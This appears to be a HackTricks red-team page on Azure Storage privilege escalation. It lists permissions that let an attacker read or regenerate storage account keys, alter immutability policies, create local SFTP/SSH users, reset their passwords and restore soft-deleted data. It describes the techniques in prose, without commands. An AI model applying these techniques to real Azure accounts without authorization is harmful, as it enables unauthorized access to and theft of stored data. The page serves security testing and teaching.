Az - Storage Privesc
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
For more information about storage check:
A principal with this permission will be able to list (and the secret values) of the access keys of the storage accounts. Allowing the principal to escalate its privileges over the storage accounts.
A principal with this permission will be able to renew and get the new secret value of the access keys of the storage accounts. Allowing the principal to escalate its privileges over the storage accounts.
Moreover, in the response, the user will get the value of the renewed key and also of the not renewed one:
A principal with this permission will be able to create or update an existing storage account updating any setting like network rules or policies.
The first permission allows to modify immutability policies in containers and the second to delete them.
Note that if an immutability policy is in lock state, you cannot do neither of both
This should allow a user having this permission to be able to take the ownership of files inside the shared filesystem.
This should allow a user having this permission to be able to modify the permissions files inside the shared filesystem.
This should allow a user having this permission to be able to perform actions inside a file system as a superuser.
With this permission, an attacker can create and update (if has Microsoft.Storage/storageAccounts/localusers/read permission) a new local user for an Azure Storage account (configured with hierarchical namespace), including specifying the user’s permissions and home directory. This permission is significant because it allows the attacker to grant themselves to a storage account with specific permissions such as read (r), write (w), delete (d), and list (l) and more. Additionaly the authentication methods that this uses can be Azure-generated passwords and SSH key pairs. There is no check if a user already exists, so you can overwrite other users that are already there. The attacker could escalate their privileges and gain SSH access to the storage account, potentially exposing or compromising sensitive data.
With this permission, an attacker can regenerate the password for a local user in an Azure Storage account. This grants the attacker the ability to obtain new authentication credentials (such as an SSH or SFTP password) for the user. By leveraging these credentials, the attacker could gain unauthorized access to the storage account, perform file transfers, or manipulate data within the storage containers. This could result in data leakage, corruption, or malicious modification of the storage account content.
To access Azure Blob Storage via SFTP using a local user via SFTP you can (you can also use ssh key to connect):
With this permissions an attacker can restore a deleted container by specifying its deleted version ID or undelete specific blobs within a container, if they were previously soft-deleted. This privilege escalation could allow an attacker to recover sensitive data that was meant to be permanently deleted, potentially leading to unauthorized access.
With these permissions, an attacker can restore a deleted Azure file share by specifying its deleted version ID. This privilege escalation could allow an attacker to recover sensitive data that was meant to be permanently deleted, potentially leading to unauthorized access.
Microsoft.Storage/storageAccounts/blobServices/containers/blobs/manageOwnership/action: Changes ownership of the blob
Microsoft.Storage/storageAccounts/blobServices/containers/blobs/modifyPermissions/action: Modifies permissions of the blob
Microsoft.Storage/storageAccounts/blobServices/containers/blobs/runAsSuperUser/action: Returns the result of the blob command
Microsoft.Storage/storageAccounts/blobServices/containers/blobs/immutableStorage/runAsSuperUser/action
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
